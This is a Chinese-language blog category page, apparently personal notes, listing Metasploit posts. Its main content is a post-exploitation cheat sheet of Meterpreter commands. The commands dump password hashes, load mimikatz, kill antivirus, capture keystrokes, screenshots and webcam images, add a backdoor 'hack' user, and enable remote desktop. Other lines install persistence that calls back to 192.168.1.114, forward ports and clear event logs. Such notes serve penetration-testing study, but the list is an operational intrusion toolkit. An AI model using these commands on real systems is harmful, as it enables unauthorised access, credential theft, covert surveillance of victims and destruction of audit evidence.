目前分類:Metasploit (3)
- Jul 01 Thu 2021 17:39
永恆之藍復現(CVE-2017-0146)
- Jul 01 Thu 2021 17:04
Metasploit-advanced user password and mimikatz module kiwi module
Metasploit
1. Basic
1. Grab the password for automatic login
- 1
2. You can use this command to query hashdump if you haven't raised the rights
- 1
3. Right escalation
- 1
- Jul 01 Thu 2021 12:11
Metasploit簡單使用——後滲透階段
Metasploit簡單使用——後滲透階段
一、meterperter常用命令
sysinfo #檢視目標主機系統資訊
run scraper #檢視目標主機詳細資訊
run hashdump #匯出密碼的雜湊
load kiwi #載入mimikatz
ps #檢視目標主機程式資訊
pwd #檢視目標當前目錄(windows)
getlwd #檢視目標當前目錄(Linux)
search -f *.jsp -d e:\ #搜尋E盤中所有以.jsp為字尾的檔案
download e:\test.txt /root #將目標機的e:\test.txt檔案下載到/root目錄下
upload /root/test.txt d:\test #將/root/test.txt上傳到目標機的 d:\test\ 目錄下
getpid #檢視當前Meterpreter Shell的程式PID
migrate 1384 #將當前Meterpreter Shell的程式遷移到PID為1384的程式上
idletime #檢視主機執行時間
getuid #檢視獲取的當前許可權
getsystem #提權
run killav/run post/windows/manage/killav #關閉防毒軟體
screenshot #截圖
webcam_list #檢視目標主機的攝像頭
webcam_snap #拍照
webcam_stream #開視訊
execute 引數 -f 可執行檔案 #執行可執行程式
run getgui -u hack -p 123 #建立hack使用者,密碼為123
run getgui -e #開啟遠端桌面
keyscan_start #開啟鍵盤記錄功能
keyscan_dump #顯示捕捉到的鍵盤記錄資訊
keyscan_stop #停止鍵盤記錄功能
uictl disable keyboard #禁止目標使用鍵盤
uictl enable keyboard #允許目標使用鍵盤
uictl disable mouse #禁止目標使用滑鼠
uictl enable mouse #允許目標使用滑鼠
load #使用擴充套件庫
run #使用擴充套件庫
run persistence -X -i 5 -p 8888 -r 192.168.1.114 #反彈時間間隔是5s 會自動連線192.168.1.114的4444埠,缺點是容易被防毒軟體查殺
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #將192.168.11.13的3389埠轉發到本地的3389埠上,這裡的192.168.11.13是獲取許可權的主機的ip地址
clearev #清除日誌